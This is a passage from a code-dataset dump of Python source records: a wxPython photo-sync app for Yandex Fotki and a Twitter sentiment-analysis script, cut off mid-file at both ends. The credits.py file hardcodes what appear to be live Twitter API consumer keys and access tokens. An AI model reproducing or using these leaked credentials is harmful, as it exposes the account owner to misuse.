{{<размер>:<атрибут>}},\n где размер: число, тогда будет найдено изображение не меньше квадрата с такой сороной\n * - будет найдено изображение, подходящее под параметры w, h, которые в свою очередь подобраны\n алгоритмом по выстраиванию изображений calc_frames\n атрибут: один из атрибутов YandexImage w, h, href\n @type template: string|unicode\n @type remote_photo: photo.RemotePhoto\n @param w:\n @param h:\n @return:\n \"\"\"\n def repl(match):\n name, attr = match.group(1).split(':')[:2]\n adjusment = name == '*'\n if adjusment:\n img = remote_photo.nearest(w, h)\n else:\n size = int(name)\n img = remote_photo.nearest(size, size)\n if attr == 'w':\n return str(w if adjusment else img.w)\n if attr == 'h':\n return str(h if adjusment else img.h)\n if attr == 'href':\n return str(img.href)\n\n return re.sub('{{(.*?)}}', repl, template, re.UNICODE)\n\n\ndef text_to_clipboard(text):\n \"\"\"\n Помещает переданный текст в буфер обмена\n @param text: текст\n @return: удалось или нет\n \"\"\"\n do = wx.TextDataObject()\n do.SetText(text)\n result = wx.TheClipboard.Open()\n if result:\n wx.TheClipboard.SetData(do)\n wx.TheClipboard.Close()\n return result\n\n\ndef fit(imgW, imgH, frameW, frameH):\n \"\"\"\n Уместить прямоугольник со сторонами imgW и imgH\n в прямоугольник со сторонами frameW, frameH, сохраняя пропорции\n исходного прямоугольника.\n @param imgW: ширина прямоугольника\n @param imgH: высота прямоугольника\n @param frameW: ширина рамки\n @param frameH: высота рамки\n @return: размер вписанного прямоугольника\n \"\"\"\n if imgW == 0 and imgH == 0:\n return 0, 0\n scale = min(1.0, float(frameW) / imgW, float(frameH) / imgH)\n return imgW * scale, imgH * scale\n\n\ndef resize(wximage, w, h, quality=wx.IMAGE_QUALITY_HIGH):\n \"\"\"\n Изменить размер изображения таким образом, чтобы оно вписывалось\n в жанный прямоугльник со сторонами w, h\n @param wximage: изображение\n @param w: ширина прямоугольника\n @param h: высота прямоугольника\n @param quality: качество конвертации\n @return: измененное изображение\n \"\"\"\n img_w = wximage.GetWidth()\n img_h = wximage.GetHeight()\n new_w, new_h = fit(img_w, img_h, w, h)\n return wximage.Rescale(new_w, new_h, quality)\n\n\ndef find_files(path, pattern):\n regex = re.compile(pattern, re.IGNORECASE | re.UNICODE)\n for dirpath, dirnames, filenames in os.walk(path):\n for f in filenames:\n if re.match(regex, f):\n yield os.path.join(dirpath, f)\n\n\ndef get_mtime(path, pattern):\n regex = re.compile(pattern, re.IGNORECASE | re.UNICODE)\n mtime = os.stat(path).st_mtime\n for dirpath, dirnames, filenames in os.walk(path):\n has_files = any((re.match(regex, f) for f in filenames))\n if has_files:\n mtime = max(mtime, os.stat(dirpath).st_mtime)\n return datetime.datetime.fromtimestamp(mtime)\n\n\ndef check_files(path, pattern):\n return bool(list(itertools.islice(find_files(path, pattern), 1)))\n\n\ndef count_files(path, pattern):\n return sum(1 for i in find_files(path, pattern))\n\n\ndef http_handler(f):\n def wrapper(*args, **kwargs):\n try:\n return f(*args, **kwargs)\n except urllib2.HTTPError as err:\n msg = str(err)\n if err.code == 403:\n msg += u'\\nНе удается войти в систему. Проверьте правильность имени пользователя и пароля.'\n wx.MessageBox(msg, u'Ошибка', style=wx.ICON_ERROR)\n return wrapper\n\n\ndef long_time(f):\n def wrapper(*args, **kwargs):\n wx.BeginBusyCursor()\n try:\n return f(*args, **kwargs)\n finally:\n wx.EndBusyCursor()\n return wrapper\n\n\ndef profile(f):\n def wrapper(*args, **kwargs):\n pr = cProfile.Profile()\n pr.enable()\n # начало функции\n result = f(*args, **kwargs)\n # конец функции\n pr.disable()\n s = StringIO.StringIO()\n sortby = 'cumulative'\n ps = pstats.Stats(pr, stream=s).sort_stats(sortby)\n ps.print_stats()\n print s.getvalue()\n return result\n return wrapper\n\n#-------------------------------------------------------------------------------\n\n\ndef main():\n import itertools\n print list(itertools.islice(find_files(u'M:\\\\', '.+_lg\\.jpg'), 1))\n # for f in :\n # print f\n\nif __name__ == '__main__':\n main()\n"
},
{
"alpha_fraction": 0.5795257091522217,
"alphanum_fraction": 0.5991902947425842,
"avg_line_length": 34.02083206176758,
"blob_id": "31c2990bc8d8caaa74f5821a2447e4e3ad569483",
"content_id": "2109f10cfeb4490fb5ca275396d1366f27843e2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1732,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 48,
"path": "/lib/forms/authfrm.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\n\r\n\r\nclass AuthDialog(wx.Dialog):\r\n \"\"\"\r\n Пыш 123\r\n \"\"\"\r\n def __init__(self, parent, username, password):\r\n wx.Dialog.__init__(self, parent, title='Authorization', size=(300, 145))\r\n\r\n self.username = username\r\n self.password = password\r\n\r\n sb = wx.StaticBitmap(self)\r\n sb.SetBitmap(wx.Bitmap('share/service_auth.png'))\r\n self.textLogin = wx.TextCtrl(self, value=self.username)\r\n self.textPass = wx.TextCtrl(self, style=wx.TE_PASSWORD, value=self.password)\r\n btnOk = wx.Button(self, wx.ID_OK)\r\n buttons = wx.StdDialogButtonSizer()\r\n buttons.AddButton(btnOk)\r\n buttons.AddButton(wx.Button(self, wx.ID_CANCEL))\r\n buttons.Realize()\r\n\r\n main_sizer = wx.BoxSizer(wx.VERTICAL)\r\n sizer1 = wx.BoxSizer(wx.HORIZONTAL)\r\n sizer1.Add(sb, 0, wx.ALL, 5)\r\n input_sizer = wx.FlexGridSizer(2, 2, 12, 12)\r\n input_sizer.AddGrowableCol(1)\r\n input_sizer.Add(wx.StaticText(self, label='Login:'))\r\n input_sizer.Add(self.textLogin, 0, wx.EXPAND | wx.ALL)\r\n input_sizer.Add(wx.StaticText(self, label='Password:'))\r\n input_sizer.Add(self.textPass, 0, wx.EXPAND | wx.ALL)\r\n sizer1.Add(input_sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT, 10)\r\n main_sizer.Add(sizer1, 0, wx.EXPAND | wx.ALL, 10)\r\n main_sizer.Add(buttons, 0, wx.EXPAND | wx.LEFT | wx.RIGHT, 20)\r\n\r\n self.SetSizer(main_sizer)\r\n self.Bind(wx.EVT_BUTTON, self.OnOK, btnOk)\r\n\r\n def OnOK(self, event):\r\n self.username = self.textLogin.GetValue()\r\n self.password = self.textPass.GetValue()\r\n self.EndModal(wx.ID_OK)\r\n"
},
{
"alpha_fraction": 0.42907801270484924,
"alphanum_fraction": 0.43026003241539,
"avg_line_length": 28.285715103149414,
"blob_id": "3e8247eb024a0253c24f71eb4c4f4a9a389ea776",
"content_id": "aa226843df1bc67a34288f737b3c119c848cc188",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 996,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 28,
"path": "/phoebe.pyw",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n#todo Просмотр фотографии\r\n#todo Просмотр всего альбома\r\n#todo Настройка опций загрузки альбома\r\n#todo Настройка опций конвертации фотографий при загрузке\r\n#todo Обновление списка фотографий по команде!!!\r\n\r\nimport wx\r\nfrom lib.controllers import overviewctr\r\n\r\n#-----------------------------------------------------------------------------\r\n# Application\r\n#-----------------------------------------------------------------------------\r\n\r\nclass ThisApp(wx.App):\r\n def OnInit(self):\r\n overviewctr.OverviewController(self)\r\n return True\r\n\r\n#-----------------------------------------------------------------------------\r\n# Main cicle\r\n#-----------------------------------------------------------------------------\r\n\r\nif __name__ == \"__main__\":\r\n app = ThisApp(redirect=False)\r\n app.MainLoop()"
},
{
"alpha_fraction": 0.5668807029724121,
"alphanum_fraction": 0.5683836340904236,
"avg_line_length": 27.995901107788086,
"blob_id": "7313896636c94e78829ada09da3cd4d8e8baba5e",
"content_id": "c6af0ff721e4f7c0e01f2b0ec14b2cb5d9af28a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 7368,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 244,
"path": "/lib/models/photo.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport os\r\nimport wx\r\nimport abc\r\nimport StringIO\r\nimport datetime\r\nimport imghash\r\nimport cachedb\r\nfrom lib.extra import utils\r\n\r\n\r\nclass PhotoError(Exception):\r\n pass\r\n\r\n\r\nclass BasePhoto(object):\r\n __metaclass__ = abc.ABCMeta\r\n\r\n @staticmethod\r\n def _load_cache(sid, remote, mtime):\r\n now = datetime.datetime.now()\r\n try:\r\n cache = cachedb.Photo.get(cachedb.Photo.sid == sid, cachedb.Photo.remote == remote)\r\n if mtime > cache.modified:\r\n cache.delete_instance()\r\n cache = cachedb.Photo.create(sid=sid, remote=remote, viewed=now, modified=mtime)\r\n else:\r\n cache.viewed = now\r\n cache.save()\r\n except cachedb.Photo.DoesNotExist:\r\n cache = cachedb.Photo.create(sid=sid, remote=remote, viewed=now, modified=mtime)\r\n return cache\r\n\r\n def __init__(self):\r\n self._hash = None\r\n self._cache = None\r\n self._title = ''\r\n self._ratio = None\r\n\r\n @abc.abstractmethod\r\n def _get_img_hash(self):\r\n return None\r\n\r\n def get_title(self):\r\n return self._title\r\n\r\n def get_ratio(self):\r\n return self._ratio\r\n\r\n def get_hash(self):\r\n if self._hash is not None:\r\n return self._hash\r\n hash_values = [i.value for i in self._cache.hash_values.order_by(cachedb.HashValue.sort)]\r\n if hash_values:\r\n self._hash = imghash.ImageHash(hash_values)\r\n else:\r\n self.update_hash(self._get_img_hash())\r\n assert self._hash is not None\r\n return self._hash\r\n\r\n def update_hash(self, img_hash):\r\n rows = ({'photo': self._cache, 'sort': idx, 'value': value} for idx, value in enumerate(img_hash.values))\r\n with cachedb.transaction():\r\n cachedb.HashValue.delete().where(cachedb.HashValue.photo == self._cache).execute()\r\n cachedb.HashValue.insert_many(rows).execute()\r\n self._hash = img_hash\r\n\r\n\r\nclass RemotePhoto(BasePhoto):\r\n def __init__(self, yaphoto):\r\n \"\"\"\r\n @type yaphoto: yafotki.YandexPhoto\r\n \"\"\"\r\n BasePhoto.__init__(self)\r\n self._yaphoto = yaphoto\r\n self._title = self._yaphoto.title\r\n last_img = yaphoto.images[-1]\r\n self._ratio = float(last_img.w) / float(last_img.h)\r\n self._mtime = self._yaphoto.edited\r\n self._ctime = self._yaphoto.published\r\n self._cache = self._load_cache(sid=yaphoto.id, remote=True, mtime=self._mtime)\r\n\r\n def _get_img_hash(self):\r\n data = self._get_data(800, 800)\r\n return imghash.ImageHash.from_stream(data)\r\n\r\n def _get_data(self, w, h):\r\n img = self.nearest(w, h)\r\n now = datetime.datetime.now()\r\n try:\r\n img_data = cachedb.Image.get(cachedb.Image.link == img.href)\r\n data = img_data.data\r\n img_data.viewed = now\r\n img_data.save()\r\n except cachedb.Image.DoesNotExist:\r\n data = img.download()\r\n cachedb.Image.create(photo=self._cache, link=img.href, data=data, viewed=now)\r\n if img.w > self._cache.width or img.h > self._cache.height:\r\n self._cache.width = img.w\r\n self._cache.height = img.h\r\n if img.h:\r\n self._cache.ratio = float(img.w) / float(img.h)\r\n self._cache.save()\r\n if self._hash:\r\n self.update_hash(imghash.ImageHash.from_stream(data))\r\n return data\r\n\r\n def get_id(self):\r\n return self._yaphoto.id\r\n\r\n def get_size(self):\r\n last_img = self._yaphoto.images[-1]\r\n return int(last_img.size) if last_img.size else None\r\n\r\n def get_create_time(self):\r\n return self._ctime\r\n\r\n def get_capture_time(self):\r\n return self._yaphoto.created\r\n\r\n def wximage(self, w, h):\r\n data = self._get_data(w, h)\r\n return wx.ImageFromStream(StringIO.StringIO(data))\r\n\r\n def nearest(self, w, h, orig=False):\r\n \"\"\"\r\n Возвращает версию фотографии не менее, чем прямоугольник w, h\r\n @rtype : yafotki.YandexImage\r\n \"\"\"\r\n if not orig:\r\n images = [i for i in self._yaphoto.images if i.name != u'orig']\r\n else:\r\n images = self._yaphoto.images\r\n if not images:\r\n raise ValueError('There is no images')\r\n try:\r\n return next((i for i in images if i.w >= w or i.h >= h))\r\n except StopIteration:\r\n return images[-1]\r\n\r\n def delete(self):\r\n self._yaphoto.delete()\r\n\r\n\r\nclass LocalPhoto(BasePhoto):\r\n def __init__(self, local_path):\r\n BasePhoto.__init__(self)\r\n if not os.path.exists(local_path):\r\n raise PhotoError('File \"{}\" not found'.format(local_path))\r\n self._path = local_path\r\n self._title = os.path.split(self._path)[1]\r\n self._mtime = datetime.datetime.fromtimestamp(os.path.getmtime(self._path))\r\n self._cache = self._load_cache(sid=self._path, remote=False, mtime=self._mtime)\r\n\r\n def _get_img_hash(self):\r\n return imghash.ImageHash.from_file(self._path)\r\n\r\n def get_path(self):\r\n return self._path\r\n\r\n def get_size(self):\r\n return os.path.getsize(self._path)\r\n\r\n def get_edited_time(self):\r\n return self._mtime\r\n\r\n def get_capture_time(self):\r\n return None\r\n\r\n def wximage(self, w, h):\r\n return utils.resize(wx.Image(self._path), w, h)\r\n\r\n\r\nclass MatchedPhoto(object):\r\n def __init__(self, remote=None, local=None):\r\n if not remote and not local:\r\n raise PhotoError('Empty photo')\r\n self.__remote = remote and RemotePhoto(remote)\r\n self.__local = local and LocalPhoto(local)\r\n\r\n def is_local(self, strict=False):\r\n return bool(self.__local and (not self.__remote if strict else True))\r\n\r\n def is_remote(self, strict=False):\r\n return bool(self.__remote and (not self.__local if strict else True))\r\n\r\n def is_matched(self):\r\n return bool(self.__remote and self.__local)\r\n\r\n def is_edited(self):\r\n return self.is_matched() and self.local.get_edited_time() > self.remote.get_create_time()\r\n\r\n @property\r\n def remote(self):\r\n return self.__remote\r\n\r\n @property\r\n def local(self):\r\n return self.__local\r\n\r\n @property\r\n def data(self):\r\n return self.__remote or self.__local\r\n\r\n @property\r\n def id(self):\r\n return self.__remote and self.__remote.get_id()\r\n\r\n @property\r\n def title(self):\r\n return self.data.get_title()\r\n\r\n @property\r\n def hash(self):\r\n return self.data.get_hash()\r\n\r\n @property\r\n def ratio(self):\r\n return self.data.get_ratio()\r\n\r\n @property\r\n def size(self):\r\n return self.data.get_size()\r\n\r\n def get_capture_time(self):\r\n return self.data.get_capture_time()\r\n\r\n def assign_local(self, other):\r\n assert isinstance(other, MatchedPhoto), type(other)\r\n self.__local = other.local\r\n\r\n def similar_to(self, other):\r\n return self.hash.similar_to(other.hash)\r\n\r\n def wximage(self, w, h):\r\n return self.data.wximage(w, h)\r\n\r\n def delete(self):\r\n if self.__remote:\r\n self.__remote.delete()\r\n"
},
{
"alpha_fraction": 0.5263291597366333,
"alphanum_fraction": 0.5326888561248779,
"avg_line_length": 29.717741012573242,
"blob_id": "a71d1f367c9c739a319fdfeec6797f66e6a3d72a",
"content_id": "178b0d175922e239496ad3a5d8c788b64a181ba2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3961,
"license_type": "no_license",
"max_line_length": 98,
"num_lines": 124,
"path": "/lib/controllers/progressctr.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! coding: utf-8\r\n\r\n__author__ = 'Anton Vakhrushev'\r\n\r\nimport wx\r\n\r\n\r\nclass ProgressError(Exception):\r\n pass\r\n\r\n\r\nclass ProgressStopIteration(ProgressError):\r\n pass\r\n\r\n\r\nclass ProgressSkipIteration(ProgressError):\r\n pass\r\n\r\n\r\nclass Progress(object):\r\n\r\n @staticmethod\r\n def cover(progress, *args, **kwargs):\r\n if progress:\r\n return progress\r\n return Progress(*args, **kwargs)\r\n\r\n def __init__(self, parent=None):\r\n self.dlg = wx.GenericProgressDialog(u'Внимание', u'Идет процесс...', 100, parent,\r\n wx.PD_APP_MODAL | wx.PD_CAN_ABORT | wx.PD_CAN_SKIP)\r\n self.dlg.SetSize((450, -1))\r\n self.dlg.Refresh()\r\n self.func = None\r\n self.iterable = None\r\n self.maximum = None\r\n self.message = None\r\n self.step = 0\r\n self.current = 0\r\n self.owner_count = 0\r\n\r\n def init(self, func, iterable=None, maximum=None, title=None, message=None):\r\n # check function\r\n if not callable(func):\r\n raise ProgressError(u'`func` must be callable')\r\n self.func = func\r\n # check count\r\n if maximum is None:\r\n try:\r\n self.maximum = len(iterable)\r\n except TypeError:\r\n self.maximum = None\r\n # check iterable\r\n self.iterable = iterable\r\n if self.iterable is None:\r\n self.maximum = None\r\n # check title\r\n if message is None:\r\n self.message = lambda index, item: unicode(item)\r\n elif isinstance(message, basestring):\r\n self.message = lambda index, item: unicode(message)\r\n elif callable(message):\r\n self.message = lambda index, item: unicode(message(index, item))\r\n else:\r\n raise ProgressError(u'{} is not appropriate type for `message`'.format(type(message)))\r\n self.current = 0\r\n self.step += 1\r\n self.dlg.SetTitle(u'[Шаг {}] {}'.format(self.step, title or u'Внимание'))\r\n self.dlg.Resume()\r\n\r\n def run(self):\r\n try:\r\n self.dlg.SetRange(self.maximum or 100)\r\n if self.iterable is not None:\r\n for item in self.iterable:\r\n self.update(self.message(self.current, item))\r\n yield self.func(item)\r\n self.current += 1\r\n else:\r\n self.update(self.message(self.current, None))\r\n yield self.func()\r\n self.current += 1\r\n except ProgressSkipIteration:\r\n return\r\n\r\n def update(self, text):\r\n if len(text) > 50:\r\n text = u'...' + text[-50:]\r\n if self.maximum is None:\r\n text = u'[{}] {}'.format(self.current, text)\r\n self.dlg.Pulse(text)\r\n else:\r\n text = u'[{:.2%}] {}'.format(float(self.current) / self.maximum, text)\r\n self.dlg.Update(self.current, text)\r\n if self.dlg.WasCancelled():\r\n print 'stopped'\r\n raise ProgressStopIteration()\r\n if self.dlg.WasSkipped():\r\n print 'skipped'\r\n raise ProgressSkipIteration()\r\n\r\n def map(self, func, iterable, count=None, title=None, message=None):\r\n self.init(func, iterable, count, title, message)\r\n for item in self.run():\r\n yield item\r\n\r\n def wrap(self, iterable, count=None, title=None, message=None):\r\n self.init(lambda x: x, iterable, count, title, message)\r\n for item in self.run():\r\n yield item\r\n\r\n def do(self, func, title=None):\r\n self.init(func, None, None, title, title)\r\n return next(self.run())\r\n\r\n def close(self):\r\n self.dlg.Destroy()\r\n\r\n def __enter__(self):\r\n self.owner_count += 1\r\n\r\n def __exit__(self, exc_type, exc_val, exc_tb):\r\n self.owner_count -= 1\r\n if not self.owner_count:\r\n self.close()"
},
{
"alpha_fraction": 0.5297074913978577,
"alphanum_fraction": 0.5420475602149963,
"avg_line_length": 31.18181800842285,
"blob_id": "7d331993415655f3a67cb8955443c219cbeb5135",
"content_id": "a8270c0d294a52ce9b4f23f006e10bd06a517bbd",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2208,
"license_type": "no_license",
"max_line_length": 103,
"num_lines": 66,
"path": "/lib/models/imghash.py",
"repo_name": "anwinged/phoebe",
"src_encoding": "UTF-8",
"text": "#! python\r\n#! -*- coding: utf-8 -*-\r\n\r\n__author__ = 'anton'\r\n\r\nimport subprocess\r\nimport re\r\nimport itertools\r\n\r\n\r\nclass ImageHash(object):\r\n\r\n PATTERN = r'^\\s*PH[1-7]:\\s*([\\d\\.\\+\\-]+),\\s*([\\d\\.\\+\\-]+)\\s*$'\r\n LENGTH = 42\r\n\r\n def __init__(self, values=None):\r\n self.__values = []\r\n if values is not None:\r\n self.__values = list(values)\r\n assert len(self.__values) == ImageHash.LENGTH, 'Get {}'.format(len(self.__values))\r\n\r\n @property\r\n def values(self):\r\n return self.__values\r\n\r\n def similar_to(self, other):\r\n if self and other:\r\n return sum(map(lambda x, y: (x-y)*(x-y), self.values, other.values))\r\n return float(1 << 32)\r\n\r\n def __nonzero__(self):\r\n return bool(self.__values)\r\n\r\n def __str__(self):\r\n if not self.__values:\r\n return '<Empty>'\r\n return str(self.__values)\r\n\r\n def __eq__(self, other):\r\n return self.similar_to(other)\r\n\r\n @classmethod\r\n def from_file(cls, filename):\r\n text = subprocess.check_output(['identify', '-verbose', '-moments', filename.encode('cp1251')])\r\n pairs = re.findall(cls.PATTERN, text, re.MULTILINE)\r\n return cls([float(i) for i in itertools.chain.from_iterable(pairs)])\r\n\r\n @classmethod\r\n def from_stream(cls, data):\r\n p = subprocess.Popen(['identify', '-verbose', '-moments', '-'],\r\n stdout=subprocess.PIPE,\r\n stdin=subprocess.PIPE,\r\n stderr=subprocess.STDOUT,\r\n shell=True)\r\n text = p.communicate(input=data)[0]\r\n pairs = re.findall(cls.PATTERN, text, re.MULTILINE)\r\n return cls([float(i) for i in itertools.chain.from_iterable(pairs)])\r\n\r\n\r\nif __name__ == '__main__':\r\n data = open(u'D:\\\\Temp\\\\Тоха и Анька\\\\0_ac38b_a4e826_XS.jpg', 'rb').read()\r\n data_hash = ImageHash.from_stream(data)\r\n file_hash = ImageHash.from_file(u'D:\\\\Temp\\\\Тоха и Анька\\\\0_ac38b_a4e826_XS.jpg')\r\n print 'DATA', data_hash, 'LEN', len(data_hash.values)\r\n print 'FILE', file_hash, 'LEN', len(file_hash.values)\r\n print 'DIFF', data_hash == file_hash"
}
] | 15 |
NathanDuran/BERT | https://github.com/NathanDuran/BERT | 7dfc12e150c6fe73de9636f1b72cca41a1273d62 | 1db39a253ab98dc118eac7f23fdf4d506b580d58 | e9c59640474c8db01933d07db21e9ba54ae26b0f | refs/heads/master | 2020-04-06T21:15:49.828123 | 2019-11-20T00:17:52 | 2019-11-20T00:17:52 | 157,798,165 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4763385057449341,
"alphanum_fraction": 0.4818652868270874,
"avg_line_length": 33.46428680419922,
"blob_id": "ecb52a1a6d4499210716ac4893871d275e21d2d4",
"content_id": "a9e891d0dda59dc5b60cee02db0004b5c50791e5",
"detected_licenses": [
"Apache-2.0",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2895,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 84,
"path": "/BERT_run_extract_features.py",
"repo_name": "NathanDuran/BERT",
"src_encoding": "UTF-8",
"text": "import getopt\nimport os\nimport sys\nimport subprocess\n\n\ndef main(argv):\n list_flag = False\n set_name = ''\n\n # Read command line args\n try:\n opts, args = getopt.getopt(argv, \"ls:\", [\"set_name=\"])\n except getopt.GetoptError:\n print(\"test.py -i <set_name>\")\n sys.exit(2)\n for opt, arg in opts:\n if opt == '-l':\n list_flag = True\n if opt in (\"-s\", \"--set_name\"):\n set_name = arg\n\n # BERT args\n input_dir = \"swda_data/\"\n output_dir = \"swda_output/BERT_Features/\"\n\n vocab_file = \"BERT_Base/vocab.txt\"\n bert_config_file = \"BERT_Base/bert_config.json\"\n init_checkpoint = \"swda_output/BERT_Base/train/model.ckpt-18038\"\n layers = -1\n max_seq_length = 128\n batch_size = 8\n\n # If running on a list of files\n if list_flag:\n\n # Open file list\n with open(input_dir + set_name + \"_split.txt\") as file_list:\n\n # Set input and create output directories\n input_dir += set_name + \"_utt/\"\n\n output_dir += set_name + \"/\"\n if not os.path.exists(output_dir):\n os.makedirs(output_dir, mode=0o777)\n\n # Run BERT for each file\n for line in file_list:\n\n input_file = input_dir + line.rstrip() + \"_utt.txt\"\n output_file = output_dir + line.rstrip() + \"_encodings.jsonl\"\n\n command_line_args = \"--input_file=\" + input_file + \" \" + \\\n \"--output_file=\" + output_file + \" \" + \\\n \"--vocab_file=\" + vocab_file + \" \" \\\n \"--bert_config_file=\" + bert_config_file + \" \" \\\n \"--init_checkpoint=\" + init_checkpoint + \" \" \\\n \"--layers=\" + str(layers) + \" \" \\\n \"--max_seq_length=\" + str(max_seq_length) + \" \" \\\n \"--batch_size=\" + str(batch_size)\n\n process = subprocess.check_call(\"nice python extract_features.py \" + command_line_args, shell=True)\n \n del process\n\n # Else just run on the full set\n else:\n input_file = input_dir + set_name + \"_set_utt.txt\"\n output_file = output_dir + set_name + \"_set_encodings.jsonl\"\n\n command_line_args = \"--input_file=\" + input_file + \" \" + \\\n \"--output_file=\" + output_file + \" \" + \\\n \"--vocab_file=\" + vocab_file + \" \" \\\n \"--bert_config_file=\" + bert_config_file + \" \" \\\n \"--init_checkpoint=\" + init_checkpoint + \" \" \\\n \"--layers=\" + str(layers) + \" \" \\\n \"--max_seq_length=\" + str(max_seq_length) + \" \" \\\n \"--batch_size=\" + str(batch_size)\n\n os.system(\"python extract_features.py \" + command_line_args)\n\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n"
}
] | 1 |
karthikvg/Twitter_Sentiment_Analysis | https://github.com/karthikvg/Twitter_Sentiment_Analysis | c64d25dce1be1d2a4408c531c0dc8c9d95ce7c91 | 31805490dcda5fa350b802c6290b4579c5f76293 | 279071d6e71c5d8e72770c5fb5732e197a59b9ff | refs/heads/master | 2020-04-17T07:21:25.756242 | 2019-01-18T07:52:11 | 2019-01-18T07:52:11 | 166,365,814 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.568561851978302,
"alphanum_fraction": 0.5852842926979065,
"avg_line_length": 22.076923370361328,
"blob_id": "b3c0b4fddaac1ed4e48ace8f3c9db7d7472102a0",
"content_id": "a2002eaf745f0132ade856dac401fd403637fef4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 299,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 13,
"path": "/helpers.py",
"repo_name": "karthikvg/Twitter_Sentiment_Analysis",
"src_encoding": "UTF-8",
"text": "def get_message(temp):\n\n start = temp.find(\"text\")+8\n temp1 = temp[start:]\n end = temp1.find(\",\")\n return temp[start:start+end-1]\n\n\ndef write_to_a_file(filename, data):\n\n with open(filename,\"w\", encoding='utf-8') as writer:\n for x in data:\n writer.write(str(x)+'\\n')"
},
{
"alpha_fraction": 0.6741573214530945,
"alphanum_fraction": 0.6741573214530945,
"avg_line_length": 21,
"blob_id": "cf3d0c270e2590843cb4008333666d8ecb04a039",
"content_id": "6f9ab654fbc6a25e2ec63e19f98cdd345dd8b551",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 89,
"license_type": "no_license",
"max_line_length": 23,
"num_lines": 4,
"path": "/credits.py",
"repo_name": "karthikvg/Twitter_Sentiment_Analysis",
"src_encoding": "UTF-8",
"text": "CONSUMER_KEY=\"1k92yCTO1Ihj0R5FujNNJmUbS\"\nCONSUMER_SECRET=\"hZtKpRq547ZifpRE56IWzsclsiYtF9QTHy8UkCtAG89kx5rvfT\"\nACCESS_TOKEN=\"1039355503044845569-kmHjNNPvoeN6n5IszPLTRZa9zmuvSV\"\nACCESS_SECRET=\"2wV2K6R7zgMM4QS30Pj4QhPZrkkVZXAsD0e457WO9e4D6\"\n\n"
},
{
"alpha_fraction": 0.6440913677215576,
"alphanum_fraction": 0.650446891784668,
"avg_line_length": 36.296295166015625,
"blob_id": "fbbe093fd42a5634d62153f7ad1a34d99a4f9f7a",
"content_id": "8e9cbb95f325a2a43696b446ebe278b597dcda3d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5035,
"license_type": "no_license",
"max_line_length": 120,
"num_lines": 135,
"path": "/stream_tweets.py",
"repo_name": "karthikvg/Twitter_Sentiment_Analysis",
"src_encoding": "UTF-8",
"text": "from tweepy import API\nfrom tweepy import Cursor\nfrom tweepy.streaming import StreamListener\nfrom tweepy import Stream\nfrom tweepy import OAuthHandler\nfrom textblob import TextBlob\n\nimport re\nimport numpy as np\nimport pandas as pd\nimport credits\nimport matplotlib.pyplot as plt\nimport helpers\n\n\nclass TwitterClient:\n def __init__(self, user=None): # Authenticates the user\n self.auth = TwitterAuthenticator().authenticate()\n self.twitter_client = API(self.auth, wait_on_rate_limit=True)\n self.user = user\n\n def get_timeline_tweets(self, count): # Generates the timeline tweets for a given user id\n tweets = list()\n for tweet in Cursor(self.twitter_client.user_timeline, id=self.user).items(count):\n tweets.append(tweet)\n return tweets\n\n def get_friends(self, count): # Returns all the friends for a given user id\n friends = list()\n for friend in Cursor(self.twitter_client.friends, id=self.user).items(count):\n friends.append(friend)\n return friends\n\n def get_twitter_client_api(self): # Return the the twitter_client_api of the authenticated user\n return self.twitter_client\n\n\n# TwitterListener is used to get the data and also to handle the errors\nclass TwitterListener(StreamListener):\n\n def __init__(self, filename):\n self.filename = filename\n\n def on_data(self, data):\n with open(self.filename, 'a')as writing:\n writing.write(data)\n return True\n\n def on_error(self, status):\n if status == 420:\n print(status)\n return False\n print(status)\n\n\n# TwitterAuthenticator is used to authenticate the user with credentials listed in credits.py\nclass TwitterAuthenticator:\n\n def authenticate(self): # A method to authenticate the user\n auth = OAuthHandler(credits.CONSUMER_KEY, credits.CONSUMER_SECRET)\n auth.set_access_token(credits.ACCESS_TOKEN, credits.ACCESS_SECRET)\n return auth\n\n\nclass TwitterStreamer:\n\n def __init__(self):\n self.auth = TwitterAuthenticator()\n\n def stream_tweets(self, filename,\n hash_tag_list): # Used to stream tweets for the given hash_tag_list to given file name\n\n listener = TwitterListener(filename)\n auth = self.auth.authenticate()\n stream = Stream(auth, listener)\n stream.filter(track=hash_tag_list)\n\n\nclass TweetAnalyzer:\n\n def clean_tweet(self, tweet): # Used to clean the given tweet which makes use of regular expression library\n return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n def analyze_tweet_sentiment(self, tweet): # Returns 1,-1,0 for positive, negative, neutral sentiments respectively\n analyze = TextBlob(self.clean_tweet(tweet))\n if analyze.sentiment.polarity > 0:\n return 1\n elif analyze.sentiment.polarity < 0:\n return -1\n else:\n return 0\n\n def 